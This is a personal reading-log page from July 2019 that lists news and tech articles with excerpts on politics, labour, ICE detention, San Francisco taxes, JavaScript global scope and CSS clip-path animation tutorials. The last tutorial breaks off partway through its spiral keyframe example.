James Reads


Day of Jul 13th, 2019

Day of Jul 12th, 2019

  • New State Climate Law: ‘Compromise Bill’ Nevertheless ‘Historic’

    Governor Andrew Cuomo signed the Climate Leadership and Community Protection Act (CLCPA) into law last week, finalizing legislation that has been labeled “the most aggressive climate change legislation in the nation,” “comprehensive,” and a “historic compromise.”

    Read at 03:23 pm, Jul 12th

  • ICE Just Quietly Opened Three New Detention Centers, Flouting Congress’ Limits

    When members of Congress reached a bipartisan deal to end the government shutdown in February, they gave Immigration and Customs Enforcement a simple instruction: Stop detaining so many people.

    Read at 09:20 pm, Jul 12th

  • NYPD let convicted pedophile Jeffrey Epstein skip judge-ordered check-ins

    Convicted pedophile Jeffrey Epstein never once checked in with city cops in the eight-plus years since a Manhattan judge ordered him to do so every 90 days — and the NYPD says it’s fine with that.

    Read at 04:54 pm, Jul 12th

  • It Was Never About Busing

    When Senator Kamala Harris confronted former Vice President Joe Biden at the second Democratic presidential debate about his support of bills to ban busing for school desegregation during the 1970s and early ’80s, he gave a sort of denial. “I did not oppose busing in America,” he said.

    Read at 04:51 pm, Jul 12th

  • Image Compression with Expo CLI

    Images often take up the most space out of any asset type in mobile apps given how prevalent they are and how large they can be. At Expo, we want to help you optimize your apps as much as possible to speed up download times and decrease storage space for your end users.

    Read at 04:16 pm, Jul 12th

  • Let’s talk about sex

    It’s been a long time since I’ve talked about sex or relationships on the internet. And the last time, I really didn’t even touch on sex — I wasn’t confident enough in myself or how to speak to my sexuality to wade into that topic.

    Read at 04:08 pm, Jul 12th

  • Beating Trump and Building Working Class Power in 2020

    Most years begin (or end) with the usual hand wringing and angst over the existential future of organized labor – “Is there any hope for labor to survive?” “Are unions still relevant?” But not this year.

    Read at 03:58 pm, Jul 12th

  • ‘Outright disrespectful’: Four House women struggle as Pelosi isolates them 

    House Speaker Nancy Pelosi admonished Democrats for personally attacking one another, warning in a closed-door meeting Wednesday that the party’s fracturing was jeopardizing its majority. “You got a complaint? You come and talk to me about it.”

    Read at 03:39 pm, Jul 12th

  • Thousands Are Targeted as ICE Prepares to Raid Undocumented Migrant Families

    Nationwide raids to arrest thousands of members of undocumented families have been scheduled to begin Sunday, according to two current and one former homeland security official, moving forward with a rapidly changing operation, the final details of which remain in flux.

    Read at 05:11 pm, Jul 12th

  • Warren, Biden Campaigns Appear to Find Loophole Around Paid Internships

    Unpaid interns are practically non-existent among Democratic presidential campaigns in 2019. But some top-tier candidates appear to be finding a creative way to tap unpaid talent: offering vague “fellowship” opportunities as volunteer positions.

    Read at 03:04 pm, Jul 12th

  • The Jeffrey Epstein case is why people believe in Pizzagate

    The arrest of the apparent billionaire investor Jeffrey Epstein at a New Jersey airport on Saturday on federal charges for crimes he was accused of during the Bush administration should not be surprising to anyone who has followed the news carefully.

    Read at 02:22 pm, Jul 12th

  • Amazon Workers Plan Prime Day Strike at a Minnesota Warehouse

    Amazon.com Inc. warehouse workers in Minnesota plan to strike during the online retailer’s summer sales extravaganza, a sign that labor unrest persists even after the company committed to paying all employees at least $15 an hour last year.

    Read at 09:48 am, Jul 12th

  • The Problem With HR

    For 30 years, we’ve trusted human-resources departments to prevent and address workplace sexual harassment. How’s that working out?

    Read at 09:34 am, Jul 12th

  • Using Rust to Scale Elixir for 11 Million Concurrent Users

    Over the last year, the Backend Infrastructure team at Discord was hard at work improving the scalability and performance of our core real-time communications infrastructure.

    Read at 09:13 am, Jul 12th

  • The More, the Better: San Francisco Leads New Kind of Tax Revolt

    San Francisco is emerging as one of the most receptive places in the country for new taxes. In recent weeks:

    • San Francisco leaders supported the proposed overhaul of the city’s gross receipts tax structure, which would be the fourth tax-raising proposal on the city’s November ballot.

    • A San Francisco Superior Court judge upheld an initiative raising commercial lease taxes to fund early childhood education and upheld a Salesforce.com-backed initiative imposing gross receipts taxes on companies earning more than $50 million to support homeless services.

    • A pair of recent court rulings upheld locally passed tax initiatives—including one backing the city’s authority to seek taxes from drivers who use paid parking lots at state universities—which could embolden tax enthusiasts in San Francisco even more.

    “I think SF is going to be the poster child, one way or another, for aggressively looking for money from business,” Joseph Bankman, Stanford University professor of law and business, said in an email.

    Expect a ripple effect as local officials around the state talk about what worked in San Francisco and how to push the envelope in their own localities, said Rex Hime, president and CEO of the California Business Properties Association. The trade group’s members include Target Inc., Regency Centers Corp., and CBRE Group Inc. “I think we all know that once something violates the process that others certainly follow suit thereafter, so we anticipate there will be a lot of these kinds of elections up and down the state,” Hime said. The impact is clear for his members: “The property owners can’t leave. The tenants can.”

    Voters over the past two decades approved taxes to pay for services or programs on top of existing taxes used to cover bonds and schools. Governments and taxpayers probably haven’t yet reached the tax saturation point but may be there in a decade, said Larry Tramutola, an election consultant who shepherded successful sugar-sweetened beverage taxes in San Francisco, Oakland, Berkeley, and Albany, Calif., and Boulder, Colo. “And no one knows when the golden goose is going to stop laying the golden eggs. But at some point, there’s going to be fewer eggs or no eggs in some communities. We just haven’t gotten there yet,” Tramutola said.

    Setting the Trend

    For now, San Francisco is the trendsetter. It’s the first major California city to test a state Supreme Court decision involving the Southern California city of Upland that supported the argument that tax initiatives by local governments can pass by a simple majority vote.

    “The July 5th ruling would open the door for local governments to use the initiative process to avoid the two-thirds voter approval margin entirely and pass more special taxes, but next we will see how the Court of Appeal interprets the issues,” Laura Dougherty, a staff attorney with the Howard Jarvis Taxpayers Association, which challenged the initiatives, said in an email. Howard Jarvis and the California Business Properties Association filed a notice of appeal July 8.

    San Francisco leaders, in addition to putting the gross receipts overhaul on the ballot, are supporting three new taxes for the November election: an excessive CEO salary tax, a 1.5% to 3.25% tax on shared rides, and a stock-based compensation tax.

    “Regardless, all of these tax measures will require voter approval within the City and County of San Francisco,” said Kelly Salt, a public finance partner with Best Best & Krieger LLP in San Diego. “And as you well know, the cost of living there is already very high and will become more burdensome as a result of tax measures such as these. Ultimately, it is a matter of how much more of a tax burden voters are willing to tolerate.”

    Gross Receipts Revamp

    Mayor London Breed (D) and board President Norman Yee asked the city controller to develop a next-generation tax to replace the gross receipts structure voters adopted in 2012. That measure, also led by the Controller’s office, was implemented to phase out the much-despised 1.5% payroll tax. The payroll tax now stands at 0.38%, as the phase out hasn’t been completely revenue neutral.

    Breed and Yee requested an initiative to create a more efficient tax system while ensuring the system is fair and equitable, including for small businesses. The effort would also identify ways to generate additional revenue to address the cost of housing and homelessness, support youth and families, improve behavioral health, and enhance the city’s public transportation system, a July 3 statement said.

    An overarching plan is needed for San Francisco’s “current very complex patchwork of taxes, suspension of phase outs, more proposals on the way,” said Charles Moll III, a McDermott Will & Emery LLP tax law partner in San Francisco. But “any talk about a fair and equitable system usually means new and higher taxes.”

    Michael Colantuono, managing partner and municipal finance attorney at Colantuono, Highsmith & Whatley PC in Grass Valley, Calif., shrugged at San Francisco’s latest effort. “LA periodically goes through business tax reviews. Goal is always to maintain or increase revenues while reducing bureaucratic impositions on business. Their lack of success explains why my So Cal office is in Pasadena,” Colantuono said in an email.

    Fueling Tax Fire

    San Francisco used the Upland decision for a City Attorney opinion to conclude “it seems very likely that voters may now propose special taxes by initiative subject only to majority vote.”

    “In light of the multiple lawsuits filed to date, the courts or, ultimately, the California Supreme Court, will have to answer the question of whether the Upland ruling extends to the voter approval threshold for citizen initiatives proposing special taxes,” said Best Best & Krieger’s Salt. Ultimately, Salt said, California voters may be the ones to answer this question by amending the state constitution. Until then, local governments leave themselves open for litigation whether they collect a special tax approved by majority vote or decline to collect it, she said.

    San Francisco Dreaming

    San Francisco’s push for new taxes may be replicated by other local governments. “Locals are always eager for new revenues for many reasons that can lead to desperate measures such as trying to enact new taxes that often are not well designed. Locals face challenges of an eroding sales tax base in California. As we move to more services and digital goods, and less tangible personal property, locals see reduced sales tax collection,” said Annette Nellen, director of San Jose State University’s master of taxation program.

    Many places that tax goods, say weights bought at Wal-Mart to use in the garage, don’t tax services, say fees at the local gym where users can lift weights untaxed, said Tracy Gordon, senior fellow in the Urban-Brookings Tax Policy Center. “The point is it is consumption. People who have a lot of resources, you can decide whether you tax their income or yoga studios. Yoga studios are a great thing to tax because they’re not mobile because they’re trying to serve a community or neighborhood,” said Gordon.

    Among those waiting to see what happens with San Francisco’s litigation are Oakland and Fresno. Oakland, across San Francisco Bay, is defending its decision to declare a parcel tax was valid even though the measure only received a majority vote. In the Central San Joaquin Valley, Fresno was sued for not validating a sales tax measure that only received 52.17% of the vote.

    “If Oakland can, and others can as well, you’re going to see an avalanche of tax measures because the thing that has kept cities primarily from putting on tax measures is the difficult threshold of two thirds,” said Tramutola, the election consultant.

    Source: The More, the Better: San Francisco Leads New Kind of Tax Revolt

    Read at 11:32 am, Jul 12th

  • How do JavaScript’s global variables really work?

    In this blog post, we examine how JavaScript’s global variables work. Several interesting phenomena play a role: the scope of scripts, the so-called global object, and more.

    Scopes

    The lexical scope (short: scope) of a variable is the region of a program where it can be accessed. JavaScript’s scopes are static (they don’t change at runtime) and they can be nested – for example:

        function func() { // (A)
          const aVariable = 1;
          if (true) { // (B)
            const anotherVariable = 2;
          }
        }

    The scope introduced by the if statement (line B) is nested inside the scope of function func() (line A). The innermost surrounding scope of a scope S is called the outer scope of S. In the example, func is the outer scope of if.

    Lexical environments

    In the JavaScript language specification, scopes are “implemented” via lexical environments. They consist of two components:

    • An environment record (think dictionary) that maps variable names to variable values. This is where JavaScript stores variables. One key-value entry in the environment record is called a binding.

    • A reference to the outer environment – the environment representing the outer scope of the scope represented by the current environment.

    The tree of nested scopes is therefore represented by a tree of nested environments, linked by outer references.

    The global object

    The global object is an object whose properties are global variables. (We’ll examine soon how exactly it fits into the tree of environments.) It has several different names:

    • Everywhere (proposed feature): globalThis

    Other names for the global object depend on platform and language construct:

    • window: the classic way of referring to the global object. But it only works in normal browser code; not in Node.js and not in Web Workers (processes running concurrently to normal browser code).

    • self: available everywhere in browsers, including in Web Workers. But it isn’t supported by Node.js.

    • global: only available in Node.js.

    The global object contains all built-in global variables.

    The global environment

    The global scope is the “outermost” scope – it has no outer scope. Its environment is the global environment. Every environment is connected with the global environment via a chain of environments that are linked by outer references. The outer reference of the global environment is null.

    The global environment combines two environment records:

    • An object environment record that works like a normal environment record, but keeps its bindings in sync with an object. In this case, the object is the global object.

    • A normal (declarative) environment record.

    (The original post includes a diagram of these data structures; script scope and module environments are explained soon.) The next two subsections explain how the object record and the declarative record are combined.

    Creating variables

    In order to create a variable that is truly global, you must be in global scope – which is only the case at the top level of scripts:

    • Top-level const, let, and class create bindings in the declarative record.

    • Top-level var and function declarations create bindings in the object record.

        var one = 1;
        let two = 2;
        console.log(one);            // 1
        console.log(two);            // 2
        console.log(globalThis.one); // 1
        console.log(globalThis.two); // undefined

    Additionally, the global object contains all built-in global variables and contributes them to the global environment via the object record.

    Getting or setting variables

    When we get or set a variable and both environment records have a binding for that variable, then the declarative record wins:

        let foo = 1;        // declarative record
        globalThis.foo = 2; // object record
        console.log(foo);            // 1
        console.log(globalThis.foo); // 2

    Module environments

    Each module has its own environment. It stores all top-level declarations – including imports. The outer environment of a module environment is the global environment.

    The global object is generally considered to be a mistake. For that reason, newer constructs such as const, let, and classes create normal global variables (when in script scope). Thankfully, most of the code written in modern JavaScript lives in ECMAScript modules and CommonJS modules. Each module has its own scope, which is why the rules governing global variables rarely matter for module-based code.

    Source: How do JavaScript’s global variables really work?

    Read at 08:19 am, Jul 12th

Day of Jul 11th, 2019

  • ‘This doesn’t look like the best economy ever’: 40% of Americans say they still struggle to pay bills

    Sommer Johnson thought everything was finally coming together for her last year.

    Read at 09:39 am, Jul 11th

  • Announcing the Stable Release of Gatsby Themes!

    What are Gatsby themes? Using a Gatsby theme, all of your default configuration (shared functionality, data sourcing, design) is abstracted out of your site, and into an installable package.
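    To make that concrete: consuming a theme is typically just an entry in the site’s gatsby-config.js. The theme name and option below are placeholders for illustration, not taken from the announcement:

```javascript
// gatsby-config.js -- the site keeps only what is unique to it; shared
// functionality, data sourcing, and design live in the installed theme.
// "gatsby-theme-blog" and its basePath option are illustrative assumptions.
module.exports = {
  siteMetadata: {
    title: "My Site",
  },
  plugins: [
    {
      resolve: "gatsby-theme-blog",
      options: {
        basePath: "/posts",
      },
    },
  ],
};
```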

    Read at 05:38 pm, Jul 11th

  • Design patterns in Node.js: a practical guide

    Design patterns are part of the day to day of any software developer, whether they realize it or not. In this article, we will look at how to identify these patterns out in the wild and look at how you can start using them in your own projects.
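    As a taste of what spotting these patterns looks like in practice, here is a minimal sketch of the factory pattern, one of the classic patterns such guides cover. The logger classes and names are invented for illustration:

```javascript
// Factory pattern: the caller asks for "a logger" and the factory decides
// which concrete class to hand back, hiding the construction details.
class JsonLogger {
  log(msg) {
    return JSON.stringify({ level: "info", msg });
  }
}

class PlainLogger {
  log(msg) {
    return `info: ${msg}`;
  }
}

// The factory is the only place that knows about the concrete classes.
function createLogger(format) {
  return format === "json" ? new JsonLogger() : new PlainLogger();
}

console.log(createLogger("json").log("hello"));  // {"level":"info","msg":"hello"}
console.log(createLogger("plain").log("hello")); // info: hello
```

    Callers depend only on the `log` interface, so swapping output formats never touches call sites.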

    Read at 05:32 pm, Jul 11th

  • AFL-CIO leadership: the two women vying to be America's top labor official

    Liz Shuler and Sara Nelson have many things in common – both are from Oregon, both are in their 40s, and both are prominent labor leaders. Shuler is secretary-treasurer of the AFL-CIO, the nation’s largest labor federation, Nelson is president of the Association of Flight Attendants.

    Read at 05:22 pm, Jul 11th

  • Medicare for All Goes to the Hill

    House of Representatives committee hearings for Medicare for All are finally starting today. It’s a testament to M4A’s rising popularity — but overcoming opposition from Republicans, Democrats, and the health care companies will require a mass movement.

    Read at 05:15 pm, Jul 11th

  • Tree planting 'has mind-blowing potential' to tackle climate crisis

    Planting billions of trees across the world is by far the biggest and cheapest way to tackle the climate crisis, according to scientists, who have made the first calculation of how many more trees could be planted without encroaching on crop land or urban areas.

    Read at 05:09 pm, Jul 11th

  • Employee Activism Is Alive in Tech. It Stops Short of Organizing Unions.

    SAN FRANCISCO — In February, about a dozen employees at a small technology company called NPM embarked on an effort that is often frowned upon at start-ups: trying to unionize.

    Read at 05:05 pm, Jul 11th

  • ICE Used Facial Recognition to Mine State Driver’s License Databases

    WASHINGTON — Immigration and Customs Enforcement officials have mined state driver’s license databases using facial recognition technology, analyzing millions of motorists’ photos without their knowledge.

    Read at 03:33 pm, Jul 11th

  • Why Did I Have Difficulty Learning React?

    Just over six months into a job doing React development, I’ve been trying to figure out why it has taken me so long to feel comfortable with it. (Comfortable feels a bit too ambitious of a word. Maybe competent? Unexceptional? Whichever.) Working at Abstract meant learning their tech stack.

    Read at 02:37 pm, Jul 11th

  • AVA 1.0

    Back in January we started work on the 1.0 release, taking the opportunity to upgrade to Babel 7 and follow its beta releases. It’s been a year where we made massive improvements to AVA. It’s also been a year with many exciting events in our personal lives.

    Read at 02:00 pm, Jul 11th

  • A Crime by Any Name

    The horrors detailed in the press were hard to believe. Such were the conditions of the Confederate prisoner-of-war camp at Andersonville, Georgia, where, as the historian James McPherson wrote, 13,000 of the 45,000 men imprisoned “died of disease, exposure, or malnutrition.”

    Read at 09:56 am, Jul 11th

  • Justin Amash: Our politics is in a partisan death spiral. That’s why I’m leaving the GOP.

    When my dad was 16, America welcomed him as a Palestinian refugee. It wasn’t easy moving to a new country, but it was the greatest blessing of his life.

    Read at 09:54 am, Jul 11th

  • Monorepo: please do!

    You should choose a monorepo because the default behavior it encourages in your teams is visibility and shared responsibility, especially as teams scale.

    Read at 09:44 am, Jul 11th

  • The “Other Side” Is Not Dumb

    There’s a fun game I like to play in a group of trusted friends called “Controversial Opinion.”

    Read at 05:37 pm, Jul 11th

  • The Deepening Crisis in Evangelical Christianity

    Last week, Ralph Reed, the Faith and Freedom Coalition’s founder and chairman, told the group, “There has never been anyone who has defended us and who has fought for us, who we have loved more than Donald J. Trump. No one!”

    Read at 09:33 am, Jul 11th

  • Monorepos: Please don’t!

    Here we are at the beginning of 2019 and I’m engaged in yet another discussion on the merits (or lack thereof) of keeping all of an organization’s code in a “monorepo.”

    Read at 09:24 am, Jul 11th

  • Rethinking Unit Test Assertions

    Well written automated tests always act as a good bug report when they fail, but few developers spend time to think about what information a good bug report needs. There are 5 questions every unit test must answer. I’ve described them in detail before, so we’ll just skim them this time:

    Read at 08:26 am, Jul 11th

  • Generate Primary Keys (almost) Automatically

    This is really baaaad! Why is that bad? Well, you should not ask, but let’s keep the poor database design alone and focus on some more concrete problems: in particular, not having a primary key prevents a lot of smart software and middleware from working on your database.

    Read at 08:22 am, Jul 11th

  • Paid Sick Leave & Capitalism in Southern Maine — Build

    Many of the stories featured in Build’s publications are tales of success. This makes sense, because people want to know what works.

    Read at 07:42 am, Jul 11th

  • Animating with Clip-Path | CSS-Tricks

    clip-path is one of those CSS properties we generally know is there but might not reach for often for whatever reason. It’s a little intimidating in the sense that it feels like math class because it requires working with geometric shapes, each with different values that draw certain shapes in certain ways. We’re going to dive right into clip-path in this article, specifically looking at how we can use it to create pretty complex animations. I hope you’ll see just how awesome the property and its shape-shifting powers can be. But first, let’s do a quick recap of what we’re working with.

    Clip-path crash course

    Just for a quick explanation as to what clip-path is and what it provides, MDN describes it like this: The clip-path CSS property creates a clipping region that sets what part of an element should be shown. Parts that are inside the region are shown, while those outside are hidden.

    Consider the circle shape provided by clip-path. Once the circle is defined, the area inside it can be considered “positive” and the area outside it “negative.” The positive space is rendered while the negative space is removed. Taking advantage of the fact that this relationship between positive and negative space can be animated provides for interesting transition effects… which is what we’re getting into in just a bit.

    clip-path comes with four shapes out of the box, plus the ability to use a URL to provide a source to some other SVG <clipPath> element. I’ll let the CSS-Tricks almanac go into deeper detail, but here are examples of those first four shapes:

    • Circle: clip-path: circle(25% at 25% 25%);
    • Ellipse: clip-path: ellipse(25% 50% at 25% 50%);
    • Inset: clip-path: inset(10% 20% 30% 40% round 25%);
    • Polygon: clip-path: polygon(50% 25%, 75% 75%, 25% 75%);

    Combining clippings with CSS transitions

    Animating clip-path can be as simple as changing the property values from one shape to another using CSS transitions, triggered either by changing classes in JavaScript or an interactive change in state, like :hover:

        .box {
          clip-path: circle(75%);
          transition: clip-path 1s;
        }
        .box:hover {
          clip-path: circle(25%);
        }

    See the Pen clip-path with transition by Geoff Graham (@geoffgraham) on CodePen. We can also use CSS animations:

        @keyframes circle {
          0% { clip-path: circle(75%); }
          100% { clip-path: circle(25%); }
        }

    See the Pen clip-path with CSS animation by Geoff Graham (@geoffgraham) on CodePen.

    Some things to consider when animating clip-path:

    • It only affects what is rendered and does not change the box size of the element as relating to elements around it. For example, a floated box with text flowing around it will still take up the same amount of space even with a very small percentage clip-path applied to it.

    • Any CSS properties that extend beyond the box size of the element may be clipped. For example, an inset of 0% for all four sides that clips at the edges of the element will remove a box-shadow and require a negative percentage to see the box-shadow. Although, that could lead to interesting effects in and of itself!

    OK, let’s get into some light animation to kick things off.

    Comparing the simple shapes

    I’ve put together a demo where you can see each shape in action, along with a little explanation describing what’s happening. See the Pen Animating Clip-Path: Simple Shapes by Travis Almand (@talmand) on CodePen. The demo makes use of Vue for the functionality, but the CSS is easily transferred to any other type of project.
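    What the browser interpolates during that 1s transition can be made concrete with a small standalone sketch (mine, not the article’s): at progress t between 0 and 1, an intermediate radius is computed between the two circle() values.

```javascript
// What a transition between circle(75%) and circle(25%) interpolates:
// at progress t in [0, 1], the browser computes an intermediate radius.
// The 75/25 endpoints mirror the hover example; the helper is illustrative.
function circleAt(t, from = 75, to = 25) {
  const radius = from + (to - from) * t;
  return `circle(${radius}%)`;
}

console.log(circleAt(0));   // circle(75%)
console.log(circleAt(0.5)); // circle(50%)
console.log(circleAt(1));   // circle(25%)
```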
We can break those out a little more to get a handle on the values for each shape and how changing them affects the movement Circle clip-path: circle(<length|percentage> at <position>); Circle accepts two properties that can be animated: Shape radius: can be a length or percentage Position: can be a length or percentage along the x and y axis .circle-enter-active { animation: 1s circle reverse; } .circle-leave-active { animation: 1s circle; } @keyframes circle { 0% { clip-path: circle(75%); } 100% { clip-path: circle(0%); } } The circle shape is resized in the leave transition from an initial 75% radius (just enough to allow the element to appear fully) down to 0%. Since no position is set, the circle defaults to the center of the element both vertically and horizontally. The enter transition plays the animation in reverse by means of the "reverse" keyword in the animation property. Ellipse clip-path: ellipse(<length|percentage>{2} at <position>); Ellipse accepts three properties that can be animated: Shape radius: can be a length or percentage on the horizontal axis Shape radius: can be a length or percentage on the vertical axis Position: can be a length or percentage along the x and y axis .ellipse-enter-active { animation: 1s ellipse reverse; } .ellipse-leave-active { animation: 1s ellipse; } @keyframes ellipse { 0% { clip-path: ellipse(80% 80%); } 100% { clip-path: ellipse(0% 20%); } } The ellipse shape is resized in the leave transition from an initial 80% by 80%, which makes it a circular shape larger than the box, down to 0% by 20%. Since no position is set, the ellipse defaults to the center of the box both vertically and horizontally. The enter transition plays the animation in reverse by means of the "reverse" keyword in the animation property. The effect is a shrinking circle that changes to a shrinking ellipse taller than wide wiping away the first element. Then the elements switch with the second element appearing inside the growing ellipse. 
Inset clip-path: inset(<length|percentage>{1,4} round <border-radius>{1,4}); The inset shape has up to five properties that can be animated. The first four represent each edge of the shape and behave similar to margins or padding. The first property is required while the next three are optional depending on the desired shape. Length/Percentage: can represent all four sides, top/bottom sides, or top side Length/Percentage: can represent left/right sides or right side Length/Percentage: represents the bottom side Length/Percentage: represents the left side Border radius: requires the "round" keyword before the value One thing to keep in mind is that the values used are reversed from typical CSS usage. Defining an edge with zero means that nothing has changed, the shape is pushed outward to the element’s side. As the number is increased, say to 10%, the edge of the shape is pushed inward away from the element’s side. .inset-enter-active { animation: 1s inset reverse; } .inset-leave-active { animation: 1s inset; } @keyframes inset { 0% { clip-path: inset(0% round 0%); } 100% { clip-path: inset(50% round 50%); } } The inset shape is resized in the leave transition from a full-sized square down to a circle because of the rounded corners changing from 0% to 50%. Without the round value, it would appear as a shrinking square. The enter transition plays the animation in reverse by means of the "reverse" keyword in the animation property. The effect is a shrinking square that shifts to a shrinking circle wiping away the first element. After the elements switch the second element appears within the growing circle that shifts to a growing square. Polygon clip-path: polygon(<length|percentage>); The polygon shape is a somewhat special case in terms of the properties it can animate. Each property represents vertices of the shape and at least three is required. The number of vertices beyond the required three is only limited by the requirements of the desired shape. 
For each keyframe of an animation, or the two steps in a transition, the number of vertices must always match for a smooth animation. A change in the number of vertices can be animated, but will cause a popping in or out effect at each keyframe. .polygon-enter-active { animation: 1s polygon reverse; } .polygon-leave-active { animation: 1s polygon; } @keyframes polygon { 0% { clip-path: polygon(0 0, 50% 0, 100% 0, 100% 50%, 100% 100%, 50% 100%, 0 100%, 0 50%); } 100% { clip-path: polygon(50% 50%, 50% 25%, 50% 50%, 75% 50%, 50% 50%, 50% 75%, 50% 50%, 25% 50%); } } The eight vertices in the polygon shape make a square with a vertex in the four corners and the midpoint of all four sides. On the leave transition, the shape’s corners animate inwards to the center while the side’s midpoints animate inward halfway to the center. The enter transition plays the animation in reverse by means of the "reverse" keyword in the animation property. The effect is a square that collapses inward down to a plus shape that wipes away the element. The elements then switch with the second element appears in a growing plus shape that expands into a square. Let’s get into some simple movements OK, we’re going to dial things up a bit now that we’ve gotten past the basics. This demo shows various ways to have movement in a clip-path animation. The circle and ellipse shapes provide an easy way to animate movement through the position of the shape. The inset and polygon shapes can be animated in a way to give the appearance of position-based movement. See the Pen Animating Clip-Path: Simple Movements by Travis Almand (@talmand) on CodePen. Let’s break those out just like we did before. Slide Down The slide down transition consists of two different animations using the inset shape. The first, which is the leave animation, animates the top value of the inset shape from 0% to 100% providing the appearance of the entire square sliding downward out of view. 
The second, the enter animation, starts with the bottom value at 100% and then animates it down to 0%, giving the appearance of the entire square sliding downward into view.

.down-enter-active { animation: 1s down-enter; }
.down-leave-active { animation: 1s down-leave; }

@keyframes down-enter {
  0% { clip-path: inset(0 0 100% 0); }
  100% { clip-path: inset(0); }
}

@keyframes down-leave {
  0% { clip-path: inset(0); }
  100% { clip-path: inset(100% 0 0 0); }
}

As you can see, the number of sides defined in the inset path does not need to match. When the shape needs to be the full square, a single zero is all that is required. It can then animate to the new state even when the number of defined sides increases to four.

Box-Wipe

The box-wipe transition consists of two animations, again using the inset shape. The first, the leave animation, animates the entire square down to a half-size square positioned on the element’s left side. The smaller square then slides to the right out of view. The second, the enter animation, animates a similar half-size square into view from the left over to the element’s right side. Then it expands outward to reveal the entire element.

.box-wipe-enter-active { animation: 1s box-wipe-enter; }
.box-wipe-leave-active { animation: 1s box-wipe-leave; }

@keyframes box-wipe-enter {
  0% { clip-path: inset(25% 100% 25% -50%); }
  50% { clip-path: inset(25% 0% 25% 50%); }
  100% { clip-path: inset(0); }
}

@keyframes box-wipe-leave {
  0% { clip-path: inset(0); }
  50% { clip-path: inset(25% 50% 25% 0%); }
  100% { clip-path: inset(25% -50% 25% 100%); }
}

When the full element is shown, the inset is at zero. The 50% keyframes define a half-size square placed on either the left or the right. Then the two values representing the left and right edges are swapped, moving the square to the opposite side. As one side is pushed to 100%, the other must go to -50% to maintain the shape.
If it were to animate to zero instead of -50%, the square would shrink as it moved across instead of sliding out of view.

Rotate

The rotate transition is one animation with five keyframes using the polygon shape. The initial keyframe defines a polygon with four vertices that shows the entire element. Then the next keyframe moves the x and y coordinates of each vertex inward and toward the next vertex in a clockwise fashion. After all four vertices have transitioned, the square appears to have shrunk and rotated a quarter turn. The following keyframes do the same until the square has collapsed down to the center of the element. The leave transition plays the animation normally while the enter transition plays the animation in reverse.

.rotate-enter-active { animation: 1s rotate reverse; }
.rotate-leave-active { animation: 1s rotate; }

@keyframes rotate {
  0% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%); }
  25% { clip-path: polygon(87.5% 12.5%, 87.5% 87.5%, 12.5% 87.5%, 12.5% 12.5%); }
  50% { clip-path: polygon(75% 75%, 25% 75%, 25% 25%, 75% 25%); }
  75% { clip-path: polygon(37.5% 62.5%, 37.5% 37.5%, 62.5% 37.5%, 62.5% 62.5%); }
  100% { clip-path: polygon(50% 50%, 50% 50%, 50% 50%, 50% 50%); }
}

Polygons can be animated into any other position once their vertices have been set, as long as each keyframe has the same number of vertices. This can create many interesting effects with careful planning.

Spotlight

The spotlight transition is one animation with five keyframes using the circle shape. The initial keyframe defines a full-size circle positioned at the center to show the entire element. The next keyframe shrinks the circle down to twenty percent. Each following keyframe animates the position values of the circle to move it to different points on the element until it moves out of view to the left. The leave transition plays the animation normally while the enter transition plays the animation in reverse.
.spotlight-enter-active { animation: 2s spotlight reverse; }
.spotlight-leave-active { animation: 2s spotlight; }

@keyframes spotlight {
  0% { clip-path: circle(100% at 50% 50%); }
  25% { clip-path: circle(20% at 50% 50%); }
  50% { clip-path: circle(20% at 12% 84%); }
  75% { clip-path: circle(20% at 93% 51%); }
  100% { clip-path: circle(20% at -30% 20%); }
}

This may look like a complex animation at first, but it turns out to require only simple changes in each keyframe.

More adventurous stuff

Like the shapes and simple movements examples, I’ve made a demo that contains more complex animations. We’ll break these down individually as well.

See the Pen Animating Clip-Path: Complex Shapes by Travis Almand (@talmand) on CodePen.

All of these examples make heavy use of the polygon shape. They take advantage of features like stacking vertices to make elements appear "welded" and repositioning vertices for movement. Check out Ana Tudor’s "Cutting out the inner part of an element using clip-path" article for a more in-depth example that uses the polygon shape to create complex shapes.

Chevron

The chevron transition is made of two animations, each with three keyframes. The leave transition starts out as a full square with six vertices: the four corners, plus an additional vertex on each of the left and right sides. The second keyframe animates three of the vertices into place to change the square into a chevron. The third keyframe then moves the vertices out of view to the right. After the elements switch, the enter transition starts with the same chevron shape, but out of view on the left. The second keyframe moves the chevron into view and then the third keyframe restores the full square.
.chevron-enter-active { animation: 1s chevron-enter; }
.chevron-leave-active { animation: 1s chevron-leave; }

@keyframes chevron-enter {
  0% { clip-path: polygon(-25% 0%, 0% 50%, -25% 100%, -100% 100%, -75% 50%, -100% 0%); }
  75% { clip-path: polygon(75% 0%, 100% 50%, 75% 100%, 0% 100%, 25% 50%, 0% 0%); }
  100% { clip-path: polygon(100% 0%, 100% 50%, 100% 100%, 0% 100%, 0% 50%, 0% 0%); }
}

@keyframes chevron-leave {
  0% { clip-path: polygon(100% 0%, 100% 50%, 100% 100%, 0% 100%, 0% 50%, 0% 0%); }
  25% { clip-path: polygon(75% 0%, 100% 50%, 75% 100%, 0% 100%, 25% 50%, 0% 0%); }
  100% { clip-path: polygon(175% 0%, 200% 50%, 175% 100%, 100% 100%, 125% 50%, 100% 0%); }
}

Spiral

The spiral transition is a strong example of a complicated series of vertices in the polygon shape. The polygon is created to define a shape that spirals inward clockwise from the upper left of the element. Since the vertices create lines that stack on top of each other, it all appears as a single square. Over the eight keyframes of the animation, vertices are moved on top of neighboring vertices. This makes the shape appear to unwind counter-clockwise to the upper left, wiping away the element during the leave transition. The enter transition replays the animation in reverse.
.spiral-enter-active { animation: 1s spiral reverse; }
.spiral-leave-active { animation: 1s spiral; }

@keyframes spiral {
  0% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 25%, 75% 25%, 75% 75%, 25% 75%, 25% 50%, 50% 50%, 25% 50%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); }
  14.25% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 25%, 75% 25%, 75% 75%, 50% 75%, 50% 50%, 50% 50%, 25% 50%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); }
  28.5% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 25%, 75% 25%, 75% 50%, 50% 50%, 50% 50%, 50% 50%, 25% 50%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); }
